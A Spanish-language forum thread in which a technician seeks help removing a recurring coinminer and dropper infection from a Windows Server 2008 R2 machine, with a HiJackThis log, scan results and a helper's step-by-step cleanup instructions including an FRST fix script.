Virus persistente se ejecuta cada 48hs en Windows Server 2008 sqlservrs.exe

Hola, me presento mi nombre es hernan sigo el foro hace años, creo que es la primera vez que posteo. Soy técnico informático, y tengo un server con Windows Server 2008r2, que luego de haber echo varias limpiezas, sigue infectado y cada 48/72hs se me copian archivos en la carpeta publica que el Antivirus detecta y elimina o pone en cuarentena, pero no logro desinfectar por completo hace varias semanas. Detallo a continuación

He escaneado el sistema con los programas que a continuación voy a detallar. Lo he echo mas de una vez con varios de ellos.

La computadora tenia el Antivirus Fortinet version gratuita, que puso el técnico anterior y yo no quise sacar aunque desconfiaba de el. Ahora que se ha infectado he colocado Inmunet. Hice varios los escaneos y como no termino de limpiar, probé poner en simultaneo Symantec Endpoint Security. La pagina de Inmunet aclara que puede trabajar con otros av en simultaneo.

Ahora luego de dos semanas he desinstalado Symantec, deje Inmunet e instale Microsoft Security Essentials en simultaneo con Inmunet.

Los síntomas persisten, y son los siguientes: Cada 48/72hs se me generan archivos infectados de virus en la carpeta publica que los antivirus detectan y eliminan.

Pero no logro eliminar la infección por completo, cuando creo que lo limpié, pasan 72 y los archivos se vuelven a generar y el AV los frena nuevamente.

Los programas con los que he escaneado son los siguientes:

ESET Online Scanner

Panda Cloud Cleaner

Adwcleaner

Malwarebytes

Microsoft Safety Scanner
 
HitmanPro
 
Trendmicro Housecal
 
Spybot-S&D Start Center
 
Start Emergency Kit Scanner

SUPERAntiSpyware Professional

SpyHunter 5

Repito los síntomas, cada 48 o 72hs se me copian en la carpeta publica unos archivos llamados

Dll.vbe (win.dropper.spyme)

Dll.exe

Sqlservers.exe (clam.win.coinminner.generic.7151250)

Tambien limpie con CCleaner . Dejo el log de HiJackThis

Agradezco cualquier ayuda, pensaba realizar un escaeno con algun live. Si me pueden aconsejar. En la RED hay otras 4 PC con AVAST FREE que no detectan nada, estan limpias pero igual les hice limpieza. Igualmente el virus se ejecuta por la noche, en horas en que la oficina esta cerrada y estan todas las computadoras de la red apagadas, y solo el server queda encendido. Muchas Gracias.

Logfile of HiJackThis Fork by Alex Dragokas v.2.9.0.18

Platform:  x64 Windows Server 2008 R2 (Server Enterprise (full installation)), 6.1.7601.24536, Service Pack: 1
Time:      05.12.2019 - 19:40 (UTC-03:00)
Language:  OS: Spanish (0xC0A). Display: Spanish (0xC0A). Non-Unicode: Spanish (0x2C0A)
Elevated:  Yes
Ran by:    Administrador	(group: Administrator) on SERVER , FirstRun: no

Chrome:  78.0.3904.108
Internet Explorer: 11.0.9600.19541
Default: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Chrome)

Boot mode: Normal

Running processes:
Number | Path
   1  C:\Program Files (x86)\APC\PowerChute Personal Edition\mainserv.exe
   3  C:\Program Files (x86)\AnyDesk\AnyDesk.exe
   1  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
   1  C:\Program Files (x86)\Common Files\microsoft shared\VS7Debug\mdm.exe
   1  C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
   1  C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
   1  C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
   1  C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
   1  C:\Program Files (x86)\TeamViewer\Version9\tv_w32.exe
   1  C:\Program Files (x86)\TeamViewer\Version9\tv_x64.exe
   1  C:\Program Files\BROCADE\Adapter\driver\util\hbaagent\bin\hcmagent.exe
   1  C:\Program Files\CCleaner\CCleaner64.exe
   1  C:\Program Files\Emulex\Util\Common\HbaHsMgr.exe
   1  C:\Program Files\EnigmaSoft\SpyHunter\ShMonitor.exe
   1  C:\Program Files\HitmanPro\hmpsched.exe
   1  C:\Program Files\Immunet\7.0.2\cscm.exe
   1  C:\Program Files\Immunet\7.0.2\iptray.exe
   1  C:\Program Files\Immunet\7.0.2\sfc.exe
   1  C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
   1  C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\SQLAGENT90.EXE
   1  C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\msftesql.exe
   1  C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
   1  C:\Program Files\Microsoft Security Client\MsMpEng.exe
   1  C:\Program Files\Microsoft Security Client\msseces.exe
   1  C:\Program Files\SUPERAntiSpyware\SASCore64.exe
   2  C:\SISTEMA\Apache Control\bin\apache\bin\apache.exe
   1  C:\SISTEMA\SUPERMER\BIN\Clientes.exe
   1  C:\SISTEMA\SUPERMER\BIN\Menu.exe
   1  C:\Users\Administrador\Downloads\HiJackThis.exe
   1  C:\Users\Administrador\Downloads\MSERT.exe
   1  C:\Windows\System32\IPROSetMonitor.exe
   1  C:\Windows\System32\MtxHotPlugService.exe
   1  C:\Windows\System32\cmd.exe
   2  C:\Windows\System32\conhost.exe
   2  C:\Windows\System32\csrss.exe
   1  C:\Windows\System32\dwm.exe
   1  C:\Windows\System32\inetsrv\inetinfo.exe
   1  C:\Windows\System32\lsass.exe
   1  C:\Windows\System32\lsm.exe
   1  C:\Windows\System32\mqsvc.exe
   1  C:\Windows\System32\msdtc.exe
   1  C:\Windows\System32\services.exe
   1  C:\Windows\System32\smss.exe
   1  C:\Windows\System32\spoolsv.exe
  14  C:\Windows\System32\svchost.exe
   1  C:\Windows\System32\wininit.exe
   1  C:\Windows\System32\winlogon.exe
   1  C:\Windows\explorer.exe
   1  C:\Windows\splwow64.exe
   1  \\servercodiser\sistema\SUPERMER\BIN_SINCRO\SincronizadorDeDatos.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = https://ar.yahoo.com/?fr=yset_ie_syc_oracle&type=orcl_hpset
R0 - HKU\S-1-5-21-1290145888-3760638704-4044190752-1006\Software\Microsoft\Internet Explorer\Main: [Default_Page_URL] = res://iesetup.dll/HardUser.htm
R0 - HKU\S-1-5-21-1290145888-3760638704-4044190752-1006\Software\Microsoft\Internet Explorer\Main: [First Home Page] = res://iesetup.dll/HardUser.htm
R0 - HKU\S-1-5-21-1290145888-3760638704-4044190752-1006\Software\Microsoft\Internet Explorer\Main: [Start Page] = res://iesetup.dll/HardUser.htm
R0 - HKU\S-1-5-21-1290145888-3760638704-4044190752-1008\Software\Microsoft\Internet Explorer\Main: [Default_Page_URL] = res://iesetup.dll/HardUser.htm
R0 - HKU\S-1-5-21-1290145888-3760638704-4044190752-1008\Software\Microsoft\Internet Explorer\Main: [First Home Page] = res://iesetup.dll/HardUser.htm
R0 - HKU\S-1-5-21-1290145888-3760638704-4044190752-1008\Software\Microsoft\Internet Explorer\Main: [Start Page] = res://iesetup.dll/HardUser.htm
R0 - HKU\S-1-5-21-1290145888-3760638704-4044190752-1011\Software\Microsoft\Internet Explorer\Main: [Default_Page_URL] = res://iesetup.dll/HardUser.htm
R0 - HKU\S-1-5-21-1290145888-3760638704-4044190752-1011\Software\Microsoft\Internet Explorer\Main: [First Home Page] = res://iesetup.dll/HardUser.htm
R0 - HKU\S-1-5-21-1290145888-3760638704-4044190752-1011\Software\Microsoft\Internet Explorer\Main: [Start Page] = res://iesetup.dll/HardUser.htm
R0 - HKU\S-1-5-21-1290145888-3760638704-4044190752-1012\Software\Microsoft\Internet Explorer\Main: [Default_Page_URL] = res://iesetup.dll/HardUser.htm
R0 - HKU\S-1-5-21-1290145888-3760638704-4044190752-1012\Software\Microsoft\Internet Explorer\Main: [First Home Page] = res://iesetup.dll/HardUser.htm
R0 - HKU\S-1-5-21-1290145888-3760638704-4044190752-1012\Software\Microsoft\Internet Explorer\Main: [Start Page] = res://iesetup.dll/HardUser.htm
R0 - HKU\S-1-5-21-1290145888-3760638704-4044190752-1014\Software\Microsoft\Internet Explorer\Main: [Default_Page_URL] = res://iesetup.dll/HardUser.htm
R0 - HKU\S-1-5-21-1290145888-3760638704-4044190752-1014\Software\Microsoft\Internet Explorer\Main: [First Home Page] = res://iesetup.dll/HardUser.htm
R0 - HKU\S-1-5-21-1290145888-3760638704-4044190752-1014\Software\Microsoft\Internet Explorer\Main: [Start Page] = res://iesetup.dll/HardUser.htm
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{619FFEC0-9883-40F8-AC33-AE03E39EC320}: [SuggestionsURL] = https://ar.search.yahoo.com/sugg/ie?command={SearchTerms}&appid=i&output=osxml&appid=chrie - Yahoo Search
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{619FFEC0-9883-40F8-AC33-AE03E39EC320}: [URL] = https://ar.search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default - Yahoo Search
O1 - Hosts: Reset contents to default
O1 - Hosts: 127.0.0.1 www.zoomcheck.info
O2-32 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_171\bin\jp2ssv.dll
O2-32 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_171\bin\ssv.dll
O4 - Global User Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AnyDesk.lnk    ->    C:\Program Files (x86)\AnyDesk\AnyDesk.exe --control
O4 - HKCU\..\Run: [CCleaner Monitoring] = C:\Program Files\CCleaner\CCleaner64.exe /MONITOR
O4 - HKLM\..\Run: [MSC] = c:\Program Files\Microsoft Security Client\msseces.exe -hide -runkey
O4 - HKLM\..\Run: [MtxHotPlugService] = C:\Windows\system32\MtxHotPlugService.exe v
O4 - HKLM\..\Session Manager: [BootExecute] = C:\Windows\system32\sdnclean64.exe
O4 - HKLM\..\Session Manager: [BootExecute] = bootdelete  (file missing)
O4 - MSConfig\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^APC UPS Status.lnk [backup] => C:\Program Files (x86)\APC\PowerChute Personal Edition\Display.exe (2019/04/04)
O4 - MSConfig\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk [backup] => C:\Program Files (x86)\Microsoft Office\Office10\OSA.EXE -b -l (2019/04/04)
O4 - User Startup: C:\Users\Administrador\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sincronizador.bat - Acceso directo.lnk    ->    F:\SUPERMER\BIN_SINCRO\Sincronizador.bat
O4-32 - HKLM\..\Run: [Immunet Protect] = C:\Program Files\Immunet\7.0.2\iptray.exe
O4-32 - HKLM\..\Run: [SDTray] = C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
O6 - IE Policy: HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel - present
O15 - Trusted Zone: http://1.www.s81c.com
O15 - Trusted Zone: http://2542116.fls.doubleclick.net
O15 - Trusted Zone: http://www-933.ibm.com
O15 - Trusted Zone: http://www.google-analytics.com
O15 - Trusted Zone: http://www.tecnolar.com.ar
O15 - Trusted Zone: https://apis.google.com
O15 - Trusted Zone: https://dl.google.com
O15 - Trusted Zone: https://segment-pixel.invitemedia.com
O15 - Trusted Zone: https://www.google.com.ar
O15 - Trusted Zone: https://www.googleadservices.com
O16-32 - DPF: HKLM\..\{5AE58FCF-6F6A-49B2-B064-02492C66E3F4}\DownloadInformation: MUCatalogWebControl Class [CODEBASE] = http://catalog.update.microsoft.com/v7/site/ClientControl/en/x86/MuCatalogWebControl.cab?1383831475954
O17 - DHCP DNS 1: 8.8.8.8 (Well-known DNS: Google)
O17 - DHCP DNS 2: 8.8.4.4 (Well-known DNS: Google)
O17 - HKLM\System\CCS\Services\Tcpip\..\{E70B7452-EAD7-4A1B-91EB-8C91AE036040}: [NameServer] = 8.8.4.4 (Well-known DNS: Google)
O17 - HKLM\System\CCS\Services\Tcpip\..\{E70B7452-EAD7-4A1B-91EB-8C91AE036040}: [NameServer] = 8.8.8.8 (Well-known DNS: Google)
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{E70B7452-EAD7-4A1B-91EB-8C91AE036040}: [NameServer] = 8.8.4.4 (Well-known DNS: Google)
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{E70B7452-EAD7-4A1B-91EB-8C91AE036040}: [NameServer] = 8.8.8.8 (Well-known DNS: Google)
O18 - HKLM\Software\Classes\Protocols\Handler\ms-help: [CLSID] = {314111C7-A502-11D2-BBCA-00C04F8EC294} - C:\Program Files (x86)\Common Files\Microsoft Shared\Help\hxds.dll
O18 - HKLM\Software\Classes\Protocols\Handler\ms-itss: [CLSID] = {0A9007C0-4076-11D3-8789-0000F8105754} - C:\Program Files (x86)\Common Files\Microsoft Shared\Information Retrieval\MSITSS.DLL
O18 - HKLM\Software\Classes\Protocols\Handler\msdaipp\0x00000001: [CLSID] = {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll
O18 - HKLM\Software\Classes\Protocols\Handler\msdaipp\oledb: [CLSID] = {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll
O20-32 - HKLM\..\Winlogon\Notify\SDWinLogon: [DllName] = SDWinLogon.dll (file missing)
O22 - Task (.job): (Ready) SUPERAntiSpyware Scheduled Task 38e10d51-91c4-4078-910c-d6dae7dbe491.job - C:\Program Files\SUPERAntiSpyware\SASTask.exe "C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe" /TASK:38e10d51-91c4-4078-910c-d6dae7dbe491
O22 - Task (.job): (Ready) SUPERAntiSpyware Scheduled Task 636cecce-3a4b-4e3b-92fd-ce85e26f7f43.job - C:\Program Files\SUPERAntiSpyware\SASTask.exe "C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe" /TASK:636cecce-3a4b-4e3b-92fd-ce85e26f7f43
O23 - Service R2: APC UPS Service - C:\Program Files (x86)\APC\PowerChute Personal Edition\mainserv.exe
O23 - Service R2: Adobe Acrobat Update Service - (AdobeARMservice) - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service R2: Agente SQL Server (MSSQLSERVER) - (SQLSERVERAGENT) - C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\SQLAGENT90.EXE -i MSSQLSERVER
O23 - Service R2: AnyDesk Service - (AnyDesk) - C:\Program Files (x86)\AnyDesk\AnyDesk.exe --service
O23 - Service R2: Brocade HCM Agent Service - (hcmagent) - C:\Program Files\BROCADE\Adapter\driver\util\hbaagent\bin\hcmagent.exe -d -c "C:\Program Files\BROCADE\Adapter\driver\util\hbaagent\conf\abyss.conf"
O23 - Service R2: Búsqueda de texto de SQL Server (MSSQLSERVER) - (msftesql) - C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\msftesql.exe -s:MSSQL.1 -f:MSSQLSERVER
O23 - Service R2: Diagnostics Tracking Service - (DiagTrack) - C:\Windows\System32\svchost.exe -k utcsvc; "ServiceDll" = C:\Windows\system32\diagtrack.dll
O23 - Service R2: Emulex SvcMgr - C:\Program Files\Emulex\Util\Common\HbaHsMgr.exe
O23 - Service R2: HitmanPro Scheduler - (HitmanProScheduler) - C:\Program Files\HitmanPro\hmpsched.exe
O23 - Service R2: Immunet 7.0.2 - (ImmunetProtect_7.0.2) - C:\Program Files\Immunet\7.0.2\sfc.exe
O23 - Service R2: Immunet Security Connector Monitoring Service 7.0.2 - (ImmunetSCMS_7.0.2) - C:\Program Files\Immunet\7.0.2\cscm.exe
O23 - Service R2: Intel(R) PROSet Monitoring Service - C:\Windows\system32\IProsetMonitor.exe
O23 - Service R2: SAS Core Service - (!SASCORE) - C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE
O23 - Service R2: SQL Server (MSSQLSERVER) - (MSSQLSERVER) - C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe -sMSSQLSERVER
O23 - Service R2: SpyHunter 5 Kernel Monitor - (ShMonitor) - C:\Program Files\EnigmaSoft\SpyHunter\ShMonitor.exe
O23 - Service R2: Spybot-S&D 2 Scanner Service - (SDScannerService) - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
O23 - Service R2: Spybot-S&D 2 Updating Service - (SDUpdateService) - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
O23 - Service R2: TeamViewer 9 - (TeamViewer9) - C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
O23 - Service R2: TecnolarApache - C:\SISTEMA\Apache Control\bin\apache\bin\apache.exe -k runservice
O23 - Service S2: Emulex HBA Management - C:\Program Files\Emulex\Util\Common\RMServer.exe
O23 - Service S2: Google Update Servicio (gupdate) - (gupdate) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc
O23 - Service S2: SpyHunter 5 Kernel - (EsgShKernel) - C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe
O23 - Service S2: Spybot-S&D 2 Security Center Service - (SDWSCService) - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
O23 - Service S3: Adobe Flash Player Update Service - (AdobeFlashPlayerUpdateSvc) - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service S3: Emulex MILI Management - (Emulex Management Interface Library v2) - C:\Program Files\Emulex\Util\Common\MILI2Service.exe
O23 - Service S3: Google Chrome Elevation Service - (GoogleChromeElevationService) - C:\Program Files (x86)\Google\Chrome\Application\78.0.3904.108\elevation_service.exe
O23 - Service S3: Google Update Servicio (gupdatem) - (gupdatem) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc
O23 - Service S3: Malwarebytes Service - (MBAMService) - C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
O23 - Service S3: Symantec Network Access Control - (SNAC) - C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\14.2.1015.0100.105\Bin64\snac64.exe


--
End of file

Hola @elotrohernan

Bienvenido al Foro!!!

Empecemos por lo ultimo Hijackthis a quedado obsoleto para el Malware actual.

Necesitaría que en tu próxima respuesta busques los reportes y pegues los de:

• ESET Online Scanner
• Adwcleaner
• Malwarebytes
• HitmanPro

Luego realizas lo siguiente:

Desinstala con Revo Uninstaller en su Modo Avanzado:

• Spybot y SpyHunter

Manual de Revo Uninstaller.

Luego de reiniciar:

1.- Desactiva temporalmente su antivirus y cualquier programa de seguridad.

2.- Descarga Farbar Recovery Scan Tool. en el escritorio, seleccionando la versión adecuada para la arquitectura (32 o 64bits) de su equipo. >> Como saber si mi Windows es de 32 o 64 bits.?

• Ejecuta FRST.exe.
• En el mensaje de la ventana del Disclaimer, pulsamos Yes
• En la ventana principal pulsamos en el botón Scan y esperamos a que concluya el proceso.
• Se abriran dos(2) archivos(Logs), Frst.txt y Addition.txt, estos quedaran grabados en el escritorio.

Guía: Como Ejecutar FRST

3.- En tu próxima respuesta, pega los reportes generados.

Guía : ¿Como Pegar reportes en el Foro?

Esperamos esos reporte.

Salu2.

hola @SanMar, gracias por tu respuesta. Te detallo los siguientes reportes que me decís, el de ESET no lo pude encontrar porque es antivirus online pero decia que estaba limpio el sistema. Confieso que las desinsalaciones de los softwares no la hice con REVO. No se que veneficio podia obtener.

Como los log son muy largos subi los archivos, en caso de que sea mejor lo copio. La primera vez que pase Hitman (22/11/2019) detecto y borro algo de la papelera. Estos son lo sultimos logs, donde ya no detecta nada.

Malware _____________________________________________________________________

   C:\$Recycle.Bin\S-1-5-21-1290145888-3760638704-4044190752-500\$RLP0A9C.exe
      Size . . . . . . . : 13,312 bytes
      Age  . . . . . . . : 2.0 days (2019-11-20 00:21:43)
      Entropy  . . . . . : 5.4
      SHA-256  . . . . . : 9D715857367C234C8932074C68486419590EFA362E05AD6E7500F21CA974C595
    > Kaspersky  . . . . : UDS:DangerousObject.Multi.Generic
      Fuzzy  . . . . . . : 108.0
      Forensic Cluster
         -53.9s C:\Program Files\Immunet\Quarantine\qrt01d59f5181dee5a9.001
         -53.8s C:\Program Files\Immunet\Quarantine\qrt01d59f5181dee5a9.001.dat
         -47.8s C:\Program Files\Immunet\Quarantine\qrt01d59f5185882542.002
         -47.8s C:\Program Files\Immunet\Quarantine\qrt01d59f5185882542.002.dat
         -30.0s C:\Program Files\Immunet\Quarantine\qrt01d59f519025e42e.003
         -30.0s C:\Program Files\Immunet\Quarantine\qrt01d59f519025e42e.003.dat
         -7.6s C:\Program Files\Immunet\Quarantine\qrt01d59f519d7e3974.004
         -7.6s C:\Program Files\Immunet\Quarantine\qrt01d59f519d7e3974.004.dat
         -7.2s C:\Program Files\Immunet\Quarantine\qrt01d59f519dbd3f30.005
         -7.2s C:\Program Files\Immunet\Quarantine\qrt01d59f519dbd3f30.005.dat
         -6.5s C:\Program Files\Immunet\Quarantine\qrt01d59f519e1cc5b6.006
         -6.4s C:\Program Files\Immunet\Quarantine\qrt01d59f519e1cc5b6.006.dat
          0.0s C:\$Recycle.Bin\S-1-5-21-1290145888-3760638704-4044190752-500\$RLP0A9C.exe
          1.1s C:\Program Files\Immunet\Quarantine\qrt01d59f51a2a3be5e.007
          1.1s C:\Program Files\Immunet\Quarantine\qrt01d59f51a2a3be5e.007.dat
          1.5s C:\Program Files\Immunet\Quarantine\qrt01d59f51a2db22de.008
          1.5s C:\Program Files\Immunet\Quarantine\qrt01d59f51a2db22de.008.dat

AdwCleaner[S06].txt (1,9 KB)

Addition.txt (43,1 KB)

FRST.txt (110,4 KB)

HitmanPro_20191206_0300.txt

(7,0 KB) mlaewarebytes.txt (1,5 KB)

Hola @elotrohernan

La indicación es dada para que se realice la desinstalación correctamente y no te dejen el sistema lleno de archivos basura.

En tus reportes por ejemplo tienes muchos restos de antivirus (algunos activos) que quedan después de una mala desinstalación.

Ejecutaste FRST desde un lugar incorrecto:

• Running from C:\Users\Administrador\Desktop\Limpieza virus y troyanos

Corta el ejecutable y pegalo en tu escritorio <<< Esto es Muy Importante.

Desinstala con su Herramienta especifica :

• SUPERAntiSpyware

Esto es necesario para evitar nos bloquee las eliminaciones.

Ademas de los dos antivirus instalados Inmunet y MSE figura activo e instalado también:

• Symantec Endpoint Protection

Si no lo usas lo desinstalas.

Luego de reiniciar sigue estos pasos:

1.- Muy Importante >>> Realizar una copia de Seguridad de su Registro.

• Descarga DelFix en el escritorio de Windows.
• Clic Derecho, “Ejecutar como Administrador”.
• En la ventana principal, marca solamente la casilla “Create Registry Backup”.
• Clic en Run.

Al terminar se abrirá un reporte llamado DelFix.txt, guárdelo por si fuera necesario y cierre la herramienta…

2.- Desactiva Temporalmente tu antivirus.

3.- Abre un nuevo archivo Notepad/Bloc de Notas y copia y pega este contenido:

Start
CloseProcesses:
CreateRestorePoint:
Task: {9DD72C19-E6D7-489C-8531-6E750811D958} - System32\Tasks\SUPERAntiSpyware Scheduled Task 38e10d51-91c4-4078-910c-d6dae7dbe491 => C:\Program Files\SUPERAntiSpyware\SASTask.exe [49944 2013-11-07] (SUPERAntiSpyware.com -> SUPERAdBlocker.com)
Task: {AEABEAB4-FB2F-4E8B-885B-B3B7E78C1AFF} - System32\Tasks\EOSv3 Scheduler onTime => C:\esetonlinescanner_esl.exe [8166712 2019-11-12] (ESET, spol. s r.o. -> ESET spol. s r.o.)
Task: {C5A247D4-1A13-4B2B-9B86-4FB6BED37575} - System32\Tasks\SUPERAntiSpyware Scheduled Task 636cecce-3a4b-4e3b-92fd-ce85e26f7f43 => C:\Program Files\SUPERAntiSpyware\SASTask.exe [49944 2013-11-07] (SUPERAntiSpyware.com -> SUPERAdBlocker.com)
Task: {CD20662C-B740-4023-87E5-B207B9705CC0} - System32\Tasks\EOSv3 Scheduler onLogOn => C:\esetonlinescanner_esl.exe [8166712 2019-11-12] (ESET, spol. s r.o. -> ESET spol. s r.o.)
Task: C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 38e10d51-91c4-4078-910c-d6dae7dbe491.job => C:\Program Files\SUPERAntiSpyware\SASTask.exe C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
Task: C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 636cecce-3a4b-4e3b-92fd-ce85e26f7f43.job => C:\Program Files\SUPERAntiSpyware\SASTask.exe C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings: [ProxySettingsPerUser] 0 <==== ATTENTION (Restriction - ProxySettings)
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKU\S-1-5-21-1290145888-3760638704-4044190752-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://ar.yahoo.com/?fr=yset_ie_syc_oracle&type=orcl_hpset
SearchScopes: HKU\S-1-5-21-1290145888-3760638704-4044190752-500 -> {619FFEC0-9883-40F8-AC33-AE03E39EC320} URL = hxxps://ar.search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
CHR DefaultSearchURL: Default -> hxxps://es.search.yahoo.com/search?p={searchTerms}&fr=yset_chr_syc_oracle&type=orcl_default
CHR DefaultSearchKeyword: Default -> Yahoo
CHR DefaultSuggestURL: Default -> hxxps://es.search.yahoo.com/sugg/ie?output=fxjson&command={searchTerms}&nResults=10
CHR HKLM-x32\...\Chrome\Extension: [kpdmjodecdegfglgaapafjleomjjlpnh]
R2 bddci; C:\Windows\System32\Drivers\bddci.sys [153224 2019-11-18] (Bitdefender SRL -> Bitdefender)
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (Support.com, Inc. -> SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (Support.com, Inc. -> SUPERAdBlocker.com and SUPERAntiSpyware.com)
S3 Trufos; C:\Windows\System32\Drivers\trufos.sys [439928 2019-11-18] (Bitdefender SRL -> BitDefender S.R.L.)
S3 mdareDriver_52; \??\C:\Program Files (x86)\Fortinet\FortiClient\mdare64_52.sys [X]
S3 mdareDriver_60; \??\C:\Program Files (x86)\Fortinet\FortiClient\mdare64_60.sys [X]
S3 mdareDriver_61; \??\C:\Program Files (x86)\Fortinet\FortiClient\mdare64_61.sys [X]
S3 mdareDriver_62; \??\C:\Program Files (x86)\Fortinet\FortiClient\mdare64_62.sys [X]
2019-12-02 01:38 - 2019-12-06 02:00 - 000000526 _____ C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 38e10d51-91c4-4078-910c-d6dae7dbe491.job
2019-12-02 01:38 - 2019-12-06 01:38 - 000000526 _____ C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 636cecce-3a4b-4e3b-92fd-ce85e26f7f43.job
2019-12-02 01:38 - 2019-12-02 01:38 - 000003630 _____ C:\Windows\system32\Tasks\SUPERAntiSpyware Scheduled Task 38e10d51-91c4-4078-910c-d6dae7dbe491
2019-12-02 01:38 - 2019-12-02 01:38 - 000003556 _____ C:\Windows\system32\Tasks\SUPERAntiSpyware Scheduled Task 636cecce-3a4b-4e3b-92fd-ce85e26f7f43
2019-12-02 01:38 - 2019-12-02 01:38 - 000000000 ____D C:\Users\Administrador\AppData\Roaming\SUPERAntiSpyware.com
2019-12-02 01:37 - 2019-12-02 01:38 - 000000000 ____D C:\Program Files\SUPERAntiSpyware
2019-12-02 01:37 - 2019-12-02 01:37 - 000000000 ____D C:\ProgramData\SUPERAntiSpyware.com
2019-12-02 01:37 - 2019-12-02 01:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SUPERAntiSpyware
2019-12-02 00:53 - 2019-12-02 00:53 - 043352128 _____ (SUPERAntiSpyware) C:\Users\Administrador\Downloads\SUPERAntiSpywarePro (1).exe
2019-12-02 00:52 - 2019-12-02 00:53 - 043352128 _____ (SUPERAntiSpyware) C:\Users\Administrador\Downloads\SUPERAntiSpywarePro.exe
2019-11-22 02:14 - 2019-11-22 02:14 - 000000000 ____D C:\Windows\system32\Tasks\Safer-Networking
2019-11-22 02:10 - 2019-12-06 02:30 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2019-11-22 02:10 - 2019-12-06 02:25 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2019-11-22 02:08 - 2019-11-22 02:08 - 069910960 _____ (Safer-Networking Ltd. ) C:\Users\Administrador\Downloads\spybotsd-2.7.64.0.exe
2019-11-22 01:12 - 2019-11-22 01:12 - 000000000 _____ C:\Users\Administrador\Downloads\Sin confirmar 252158.crdownload
2019-11-20 13:30 - 2019-11-20 13:30 - 000000000 ____D C:\ProgramData\Emsisoft
2019-11-20 13:26 - 2019-11-20 15:34 - 000000000 ____D C:\EEK
2019-11-20 13:23 - 2019-11-20 13:24 - 355269888 _____ C:\Users\Administrador\Downloads\EmsisoftEmergencyKit.exe
2019-11-18 13:58 - 2019-11-18 13:58 - 000439928 _____ (BitDefender S.R.L.) C:\Windows\system32\Drivers\trufos.sys
2019-11-18 13:58 - 2019-11-18 13:58 - 000153224 _____ (Bitdefender) C:\Windows\system32\Drivers\bddci.sys
2019-11-16 13:57 - 2019-11-16 13:58 - 000000000 ____D C:\ProgramData\Trend Micro
2019-11-16 13:57 - 2019-11-16 13:57 - 000000000 ____D C:\Windows\Trend Micro
2019-11-13 16:37 - 2019-12-01 14:50 - 000003698 _____ C:\Windows\system32\Tasks\EOSv3 Scheduler onLogOn
